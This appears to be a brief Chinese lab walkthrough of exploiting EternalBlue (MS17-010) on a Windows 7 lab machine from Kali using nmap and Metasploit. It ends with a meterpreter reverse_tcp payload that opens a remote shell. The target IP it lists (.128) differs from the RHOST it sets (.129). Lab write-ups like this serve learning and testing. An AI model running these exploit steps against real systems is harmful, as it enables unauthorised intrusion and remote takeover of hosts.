kali Eternalblue to win7
实验准备
攻击机: kali , IP: 192.168.226.130
靶机:win7 , IP: 192.168.226.128
实验过程
关闭win7防火墙,开放445,139端口
扫描以下,查看端口情况
$ sudo nmap -sV -A -O 192.168.226.128
启动msfconsole
$ msfconsole
使用auxiliary/scanner/smb/smb_ms17_010监测ms17_010是否可用
$ use auxiliary/scanner/smb/smb_ms17_010
主机很有可能具有ms17-010的漏洞,可攻击
开始攻击
$ use exploit/windows/smb/ms17_010_eternalblue
$ set RHOST 192.168.226.129 //靶机
$ set LHOST 192.168.226.130 // 攻击机
$ set payload windows/x64/meterpreter/reverse_tcp
$run
成功
欢迎交流指正!